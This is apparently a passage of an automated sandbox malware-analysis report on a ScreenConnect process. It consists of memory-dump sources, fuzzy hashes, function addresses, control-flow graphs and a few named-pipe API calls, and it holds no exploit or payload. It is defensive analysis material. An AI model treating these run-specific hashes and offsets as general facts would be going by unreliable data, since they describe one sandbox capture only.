                                                                                                                                                                                                                                                        • Instruction ID: a9db68b8bb16c856db2150d41ec5010aaea8337e0b956b68cfee5e048f97eab5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e2cdaad15811d183bb54d176d33271da779b832c97bd6164e2a05f40b0258a6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11E08631924748CFCB02EF7CC4A94ECBBB1EFD5200B09868FD4856B262EB309494D751
                                                                                                                                                                                                                                                        Function 00DD5988 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7a6b68e8c73298f4af5214181afb58b4f66a38ab95f600ecf3934736f6525fd9
                                                                                                                                                                                                                                                        • Instruction ID: 3cb3829f845f7b6974a7919fdfce90200b333a05a329f4f892662a4d8e2e40fd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a6b68e8c73298f4af5214181afb58b4f66a38ab95f600ecf3934736f6525fd9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8D05E74A0124CEFCB05EFB8E901A5EB7F9EB85204B1185E9DC08D3300EB326F049B81
                                                                                                                                                                                                                                                        Function 00DD1320 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3dc157396b50ef292faffd0a7c99bd93729a36be50ce304c4517cf343338d8ff
                                                                                                                                                                                                                                                        • Instruction ID: 3c27ea6fda89fc0532cbb29359a8d27a516f30b72d7f7f82cd0b1b763efc8be1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dc157396b50ef292faffd0a7c99bd93729a36be50ce304c4517cf343338d8ff
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7ED0923410A7518FC751DB20C891491BBB1AF5A224319C8EED4458F6A2CA36AC07EB11
                                                                                                                                                                                                                                                        Function 00DDB9A9 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4e509b01482dd5ecf2914371db006be911634fdadde9ab63bccfb4e3a94a56e2
                                                                                                                                                                                                                                                        • Instruction ID: 0a087b9e8cb5a7c5bc927cd1e71eda3f4d3e13225e3656941885881523d329dd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e509b01482dd5ecf2914371db006be911634fdadde9ab63bccfb4e3a94a56e2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13C012257450100FD249C158E850615A7D28BD9755F28D4679518C76A6C921DD038244
                                                                                                                                                                                                                                                        Function 00DDED38 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ea501a51658f656245c26cbe0616150cf74d14d83bc8d4b5a06c3207a135a5ac
                                                                                                                                                                                                                                                        • Instruction ID: b67baea4247ff083709d8b400a36425c3b47df21d70d06bbe04aa396fb9e6a51
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea501a51658f656245c26cbe0616150cf74d14d83bc8d4b5a06c3207a135a5ac
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AD0C73182470DC9C704BB78D455469B778EED5200F00D65AE44967121FF70D5D0D691
                                                                                                                                                                                                                                                        Function 00DDDF07 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c4e48583c91ef4ac8c9a19811a9a0c15ff64c95334fc57918c729e9e73244c52
                                                                                                                                                                                                                                                        • Instruction ID: 9cdd3cf3e09636fe235351053cb165eec7f4c56ed68d3a8e0f8d526a4d697ec1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4e48583c91ef4ac8c9a19811a9a0c15ff64c95334fc57918c729e9e73244c52
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16C04C304283448FDF01EF65ECC8A407BF2EB593413241093D005C7315D6309840DF35
                                                                                                                                                                                                                                                        Function 00DDE65F Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 28ba7a2e9151f6f04683d475f9e39e7f058ef88394452f555aa1146e7cd88880
                                                                                                                                                                                                                                                        • Instruction ID: 495a1b625ce588578dd786e8128bfc9ce80471183f1af2f10a257f3677eb0a6b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28ba7a2e9151f6f04683d475f9e39e7f058ef88394452f555aa1146e7cd88880
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7A011B2000000AA8208CA20C882C00FBA0BBA0200308C028A82882280CB22AA32CA88

                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                        Function 00DDB5A8 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;$K$[$[
                                                                                                                                                                                                                                                        • API String ID: 0-2650379400
                                                                                                                                                                                                                                                        • Opcode ID: 0b4a52c99e81ff62fecf4bf3a723eb8fb9477972397a731161c24578c5a09dab
                                                                                                                                                                                                                                                        • Instruction ID: b930d9320ac76681e5504bed6e1ee5e68281012d72f11b23f3b87496d8e6f766
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b4a52c99e81ff62fecf4bf3a723eb8fb9477972397a731161c24578c5a09dab
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49C17A787102859FC745EF68D89486EB7B6EF88310315C67AEA06CF366DB70DC098B90
                                                                                                                                                                                                                                                        Function 00DDB598 Relevance: 5.3, Strings: 4, Instructions: 289COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;$K$[$[
                                                                                                                                                                                                                                                        • API String ID: 0-2650379400
                                                                                                                                                                                                                                                        • Opcode ID: 32e07b654a67a6c31bdd0022e5462350ca1dce631c1c35f00f327503041183a7
                                                                                                                                                                                                                                                        • Instruction ID: 54181d3981f3aea7e7a3b5a12aff33bebe0770e50d9c495e3c60affaeac096f1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32e07b654a67a6c31bdd0022e5462350ca1dce631c1c35f00f327503041183a7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8C17C787502859FC745DF78D89486EBBB6EF88310315C66AEA06CF366DB70DC098B90

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:11%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:27.3%
                                                                                                                                                                                                                                                        Total number of Nodes:11
                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                        execution_graph 12075 7ff848e5365b 12076 7ff848e53650 ConnectNamedPipe 12075->12076 12078 7ff848e75862 12076->12078 12083 7ff848e58014 12085 7ff848e5801d 12083->12085 12084 7ff848e58082 12085->12084 12086 7ff848e580f6 SetProcessMitigationPolicy 12085->12086 12087 7ff848e58152 12086->12087 12079 7ff848e53632 12080 7ff848e75610 CreateNamedPipeW 12079->12080 12082 7ff848e75743 12080->12082

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FF849165506 Relevance: 3.5, Strings: 2, Instructions: 970COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0]H$8]H
                                                                                                                                                                                                                                                        • API String ID: 0-1485892393
                                                                                                                                                                                                                                                        • Opcode ID: 8a94c8e08f3a6e079229bba76c31ead7a3c127089f9f5b43c3a9c5775bc35988
                                                                                                                                                                                                                                                        • Instruction ID: bb902f1d2002dad2e8ddcbb724089b397d591cc1e769b48c47a5d00190233282
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a94c8e08f3a6e079229bba76c31ead7a3c127089f9f5b43c3a9c5775bc35988
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD62E531E1CA9B4FE7BABA2894556B972D2FF943D4F550179C44EC32C6DE3CAC428A40
                                                                                                                                                                                                                                                        Function 00007FF849165DEB Relevance: 3.3, Strings: 2, Instructions: 815COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 362 7ff849165deb-7ff849165ded 363 7ff849165def-7ff849165e40 362->363 364 7ff849165e57-7ff849165ecc 362->364 363->364 377 7ff849165ed3-7ff849165f6a 364->377 381 7ff849165f6c-7ff849165f6e 377->381 382 7ff849165f70-7ff849165f71 377->382 383 7ff849165f78-7ff849165f85 381->383 382->383 384 7ff849165fbb 383->384 385 7ff849165f87-7ff849165f9f 383->385 386 7ff849165fbf-7ff849165fc2 384->386 390 7ff849165fbd 385->390 391 7ff849165fa1-7ff849165fb6 385->391 388 7ff849165fd5-7ff849165fd8 386->388 389 7ff849165fc4-7ff849165fd1 386->389 393 7ff849165fda-7ff849165fdb 388->393 394 7ff849165fe2-7ff84916600b 388->394 389->388 395 7ff849165fd3 389->395 390->386 391->377 393->394 400 7ff849166012-7ff8491660a9 394->400 395->388 404 7ff8491660af-7ff8491660b0 400->404 405 7ff8491660ab-7ff8491660ad 400->405 406 7ff8491660b7-7ff8491660c4 404->406 405->406 407 7ff8491660fa 406->407 408 7ff8491660c6-7ff8491660de 406->408 409 7ff8491660fe-7ff849166101 407->409 416 7ff8491660fc 408->416 417 7ff8491660e0-7ff8491660f5 408->417 410 7ff849166114-7ff849166117 409->410 411 7ff849166103-7ff849166110 409->411 414 7ff849166119-7ff84916611a 410->414 415 7ff849166121-7ff84916617f call 7ff849165130 410->415 411->410 418 7ff849166112 411->418 414->415 425 7ff849166181-7ff849166184 415->425 426 7ff8491661f0-7ff849166202 415->426 416->409 417->400 418->410 427 7ff849166205-7ff84916620c 425->427 428 7ff849166186-7ff8491661c8 call 7ff849165308 call 7ff849165318 call 7ff849165140 425->428 426->427 430 7ff84916620d-7ff84916622f 427->430 431 7ff849166348-7ff8491663aa 427->431 441 7ff849166233-7ff849166237 428->441 452 7ff8491661ca-7ff8491661ed 428->452 430->441 450 7ff8491667c9-7ff8491667e7 call 7ff8491606a0 * 2 431->450 451 7ff8491663b0-7ff8491663ce call 7ff8491606a0 * 2 431->451 444 7ff849166239-7ff849166297 call 7ff849165148 441->444 444->431 467 7ff8491667ed-7ff8491667f4 450->467 468 7ff8491668f3-7ff8491668fe 450->468 465 7ff84916665f-7ff84916667d call 7ff8491606a0 * 2 451->465 466 7ff8491663d4-7ff8491663dc 451->466 452->444 455 7ff8491661ef 452->455 455->426 487 7ff84916667f-7ff849166689 465->487 488 7ff8491666a7-7ff8491666c5 call 7ff8491606a0 * 2 465->488 475 7ff8491663e3-7ff8491663e6 466->475 471 7ff849166807-7ff849166809 467->471 472 7ff8491667f6-7ff8491667f9 467->472 474 7ff849166810-7ff849166834 471->474 480 7ff8491667ff-7ff849166805 472->480 485 7ff849166836-7ff849166841 474->485 486 7ff849166880-7ff8491668b0 474->486 477 7ff8491663ec-7ff8491663fa 475->477 478 7ff8491663e8-7ff8491663ea 475->478 482 7ff8491663fd-7ff849166412 477->482 478->482 480->471 484 7ff84916680b 480->484 498 7ff849166418-7ff84916643c call 7ff849165448 * 2 482->498 499 7ff849166414-7ff849166416 482->499 484->474 485->480 515 7ff8491668b6-7ff8491668c5 486->515 516 7ff8491668b2-7ff8491668b4 486->516 493 7ff84916669d 487->493 494 7ff84916668b-7ff84916669b 487->494 507 7ff84916677c-7ff849166787 488->507 508 7ff8491666cb-7ff8491666d6 488->508 497 7ff84916669f-7ff8491666a0 493->497 494->497 497->488 502 7ff84916643f-7ff849166454 498->502 499->502 513 7ff84916645a-7ff84916647e call 7ff849165448 * 2 502->513 514 7ff849166456-7ff849166458 502->514 524 7ff84916678d-7ff84916679c 507->524 525 7ff849166789-7ff84916678b 507->525 526 7ff8491666dc-7ff8491666eb 508->526 527 7ff8491666d8-7ff8491666da 508->527 519 7ff849166481-7ff849166496 513->519 514->519 520 7ff8491668c8-7ff8491668cf 515->520 516->520 541 7ff84916649c-7ff8491664b4 call 7ff849165448 519->541 542 7ff849166498-7ff84916649a 519->542 522 7ff8491668e4-7ff8491668e5 520->522 523 7ff8491668d1-7ff8491668e2 520->523 531 7ff8491668e7-7ff8491668ec 522->531 523->531 532 7ff84916679f-7ff8491667a1 524->532 525->532 533 7ff8491666ee-7ff849166722 526->533 527->533 531->468 532->468 538 7ff8491667a7-7ff8491667b9 532->538 533->507 546 7ff849166724-7ff849166729 533->546 543 7ff8491664c3-7ff8491664d1 541->543 542->543 552 7ff8491664d7-7ff8491664e5 543->552 553 7ff8491664d3-7ff8491664d5 543->553 548 7ff84916672c-7ff849166732 546->548 550 7ff849166745-7ff84916674d 548->550 551 7ff849166734-7ff84916673c 548->551 554 7ff84916674e-7ff84916674f 550->554 556 7ff84916675f 550->556 551->554 555 7ff84916673e-7ff849166743 551->555 558 7ff8491664e8-7ff8491664e9 552->558 553->558 559 7ff849166754-7ff84916675e call 7ff849165480 554->559 555->559 557 7ff849166765-7ff84916677a 556->557 557->507 557->548 563 7ff8491664f0-7ff8491664f5 558->563 559->557 565 7ff8491664fc-7ff849166502 563->565 566 7ff849166509-7ff849166510 565->566 566->465 567 7ff849166516-7ff84916651d 566->567 567->465 568 7ff849166523-7ff84916653a 567->568 570 7ff84916653c-7ff84916654e 568->570 571 7ff84916656f-7ff84916657a 568->571 574 7ff849166554-7ff849166562 570->574 575 7ff849166550-7ff849166552 570->575 576 7ff84916657c-7ff84916657e 571->576 577 7ff849166580-7ff84916658f 571->577 578 7ff849166565-7ff849166568 574->578 575->578 579 7ff849166592-7ff849166594 576->579 577->579 578->571 582 7ff849166649-7ff84916665c 579->582 583 7ff84916659a-7ff8491665b1 579->583 582->465 583->582 586 7ff8491665b7-7ff8491665d4 583->586 589 7ff8491665d6-7ff8491665de 586->589 590 7ff8491665e0 586->590 591 7ff8491665e2-7ff8491665e4 589->591 590->591 591->582 593 7ff8491665e6-7ff8491665f0 591->593 594 7ff8491665fe-7ff849166606 593->594 595 7ff8491665f2-7ff8491665fc call 7ff8491638d8 593->595 597 7ff849166608-7ff84916662d call 7ff849165258 594->597 598 7ff849166634-7ff849166647 call 7ff849165470 594->598 595->465 595->594 597->598 598->465
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: @]H$H
                                                                                                                                                                                                                                                        • API String ID: 0-1665581402
                                                                                                                                                                                                                                                        • Opcode ID: c0e8d725ab10149703e4ae14f27ddb75cab1c4da1ebc64cb66c5656d4506c46c
                                                                                                                                                                                                                                                        • Instruction ID: 5f1b9b453ee2bf94a67d79c9e437437b476aa9154fb8799260e8bfbe3c04a927
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0e8d725ab10149703e4ae14f27ddb75cab1c4da1ebc64cb66c5656d4506c46c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64428F30E1DA868FEBAAFB2884556B977D1FFA4380F54457DD04EC3292DE38AC418B41
                                                                                                                                                                                                                                                        Function 00007FF849165957 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 747 7ff849165957-7ff849165967 748 7ff84916632d-7ff849166335 747->748 749 7ff84916596d-7ff8491659cd 747->749 753 7ff849166336-7ff84916633e 748->753 763 7ff8491659cf-7ff8491659d1 749->763 764 7ff8491659d6-7ff8491659e4 749->764 756 7ff84916633f-7ff8491663aa 753->756 797 7ff8491667c9-7ff8491667e7 call 7ff8491606a0 * 2 756->797 798 7ff8491663b0-7ff8491663ce call 7ff8491606a0 * 2 756->798 765 7ff849165a85-7ff849165a8b 763->765 774 7ff8491659e8 764->774 775 7ff8491659e6 764->775 767 7ff849165b3d-7ff849165b3f 765->767 768 7ff849165a91-7ff849165a93 765->768 771 7ff849165b61-7ff849165b68 767->771 772 7ff849165b41-7ff849165b49 767->772 768->767 773 7ff849165a99-7ff849165acd 768->773 778 7ff8491662fe-7ff849166311 771->778 779 7ff849165b6e-7ff849165b75 771->779 772->771 776 7ff849165b4b-7ff849165b60 772->776 773->748 781 7ff8491659ea-7ff8491659ed 774->781 775->781 776->771 779->778 783 7ff849165b7b-7ff849165b8d 779->783 785 7ff8491659ef-7ff8491659f5 781->785 786 7ff8491659f7-7ff849165a02 781->786 788 7ff849165b8f-7ff849165bac 783->788 789 7ff849165bd9-7ff849165be8 783->789 791 7ff849165a73-7ff849165a83 785->791 792 7ff849165a4e-7ff849165a70 786->792 793 7ff849165a04-7ff849165a21 786->793 788->756 802 7ff849165bb2-7ff849165bd7 788->802 789->778 791->765 792->791 793->753 804 7ff849165a27-7ff849165a4c 793->804 818 7ff8491667ed-7ff8491667f4 797->818 819 7ff8491668f3-7ff8491668fe 797->819 816 7ff84916665f-7ff84916667d call 7ff8491606a0 * 2 798->816 817 7ff8491663d4-7ff8491663dc 798->817 802->789 804->792 838 7ff84916667f-7ff849166689 816->838 839 7ff8491666a7-7ff8491666c5 call 7ff8491606a0 * 2 816->839 826 7ff8491663e3-7ff8491663e6 817->826 822 7ff849166807-7ff849166809 818->822 823 7ff8491667f6-7ff8491667f9 818->823 825 7ff849166810-7ff849166834 822->825 831 7ff8491667ff-7ff849166805 823->831 836 7ff849166836-7ff849166841 825->836 837 7ff849166880-7ff8491668b0 825->837 828 7ff8491663ec-7ff8491663fa 826->828 829 7ff8491663e8-7ff8491663ea 826->829 833 7ff8491663fd-7ff849166412 828->833 829->833 831->822 835 7ff84916680b 831->835 849 7ff849166418-7ff84916643c call 7ff849165448 * 2 833->849 850 7ff849166414-7ff849166416 833->850 835->825 836->831 866 7ff8491668b6-7ff8491668c5 837->866 867 7ff8491668b2-7ff8491668b4 837->867 844 7ff84916669d 838->844 845 7ff84916668b-7ff84916669b 838->845 858 7ff84916677c-7ff849166787 839->858 859 7ff8491666cb-7ff8491666d6 839->859 848 7ff84916669f-7ff8491666a0 844->848 845->848 848->839 853 7ff84916643f-7ff849166454 849->853 850->853 864 7ff84916645a-7ff84916647e call 7ff849165448 * 2 853->864 865 7ff849166456-7ff849166458 853->865 875 7ff84916678d-7ff84916679c 858->875 876 7ff849166789-7ff84916678b 858->876 877 7ff8491666dc-7ff8491666eb 859->877 878 7ff8491666d8-7ff8491666da 859->878 870 7ff849166481-7ff849166496 864->870 865->870 871 7ff8491668c8-7ff8491668cf 866->871 867->871 892 7ff84916649c-7ff8491664b4 call 7ff849165448 870->892 893 7ff849166498-7ff84916649a 870->893 873 7ff8491668e4-7ff8491668e5 871->873 874 7ff8491668d1-7ff8491668e2 871->874 882 7ff8491668e7-7ff8491668ec 873->882 874->882 883 7ff84916679f-7ff8491667a1 875->883 876->883 884 7ff8491666ee-7ff849166722 877->884 878->884 882->819 883->819 889 7ff8491667a7-7ff8491667b9 883->889 884->858 897 7ff849166724-7ff849166729 884->897 894 7ff8491664c3-7ff8491664d1 892->894 893->894 903 7ff8491664d7-7ff8491664e5 894->903 904 7ff8491664d3-7ff8491664d5 894->904 899 7ff84916672c-7ff849166732 897->899 901 7ff849166745-7ff84916674d 899->901 902 7ff849166734-7ff84916673c 899->902 905 7ff84916674e-7ff84916674f 901->905 907 7ff84916675f 901->907 902->905 906 7ff84916673e-7ff849166743 902->906 909 7ff8491664e8-7ff8491664e9 903->909 904->909 910 7ff849166754-7ff84916675e call 7ff849165480 905->910 906->910 908 7ff849166765-7ff84916677a 907->908 908->858 908->899 914 7ff8491664f0-7ff8491664f5 909->914 910->908 916 7ff8491664fc-7ff849166502 914->916 917 7ff849166509-7ff849166510 916->917 917->816 918 7ff849166516-7ff84916651d 917->918 918->816 919 7ff849166523-7ff84916653a 918->919 921 7ff84916653c-7ff84916654e 919->921 922 7ff84916656f-7ff84916657a 919->922 925 7ff849166554-7ff849166562 921->925 926 7ff849166550-7ff849166552 921->926 927 7ff84916657c-7ff84916657e 922->927 928 7ff849166580-7ff84916658f 922->928 929 7ff849166565-7ff849166568 925->929 926->929 930 7ff849166592-7ff849166594 927->930 928->930 929->922 933 7ff849166649-7ff84916665c 930->933 934 7ff84916659a-7ff8491665b1 930->934 933->816 934->933 937 7ff8491665b7-7ff8491665d4 934->937 940 7ff8491665d6-7ff8491665de 937->940 941 7ff8491665e0 937->941 942 7ff8491665e2-7ff8491665e4 940->942 941->942 942->933 944 7ff8491665e6-7ff8491665f0 942->944 945 7ff8491665fe-7ff849166606 944->945 946 7ff8491665f2-7ff8491665fc call 7ff8491638d8 944->946 948 7ff849166608-7ff84916662d call 7ff849165258 945->948 949 7ff849166634-7ff849166647 call 7ff849165470 945->949 946->816 946->945 948->949 949->816
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (]H
                                                                                                                                                                                                                                                        • API String ID: 0-4090289302
                                                                                                                                                                                                                                                        • Opcode ID: 99025a315274298b8e2ac3f15deaa779531d9a13d7f58f32cd64d7313a693b64
                                                                                                                                                                                                                                                        • Instruction ID: 02a768a57a34b59f47d61e82f6ec5bc9f680632b5221aedb2469395770352075
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99025a315274298b8e2ac3f15deaa779531d9a13d7f58f32cd64d7313a693b64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FED1C431E1DA8B4FE7BABA2884656B966D2EF943D0F540179D44EC31C6DE3CBC428B41
                                                                                                                                                                                                                                                        Function 00007FF848E53632 Relevance: 1.7, APIs: 1, Instructions: 171pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 956 7ff848e53632-7ff848e7567a 959 7ff848e7567c-7ff848e75681 956->959 960 7ff848e75684-7ff848e75741 CreateNamedPipeW 956->960 959->960 962 7ff848e75749-7ff848e7577c 960->962 963 7ff848e75743 960->963 963->962
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3297581500.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff848e50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateNamedPipe
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2489174969-0
                                                                                                                                                                                                                                                        • Opcode ID: e00d11724740b9957021337f49bcb93f68df67259d6627c38d7d43e9eb1f7cad
                                                                                                                                                                                                                                                        • Instruction ID: 2a46478f7407c94c5549a0e2db31a1bccd69812663a3cf3a89b17058b69d821c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e00d11724740b9957021337f49bcb93f68df67259d6627c38d7d43e9eb1f7cad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C151807191CA5C8FDB68EF5C9845BE9BBE0FB59710F1442AEE44DD3241DB70A8828BC1
                                                                                                                                                                                                                                                        Function 00007FF849165744 Relevance: 1.7, Strings: 1, Instructions: 420COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
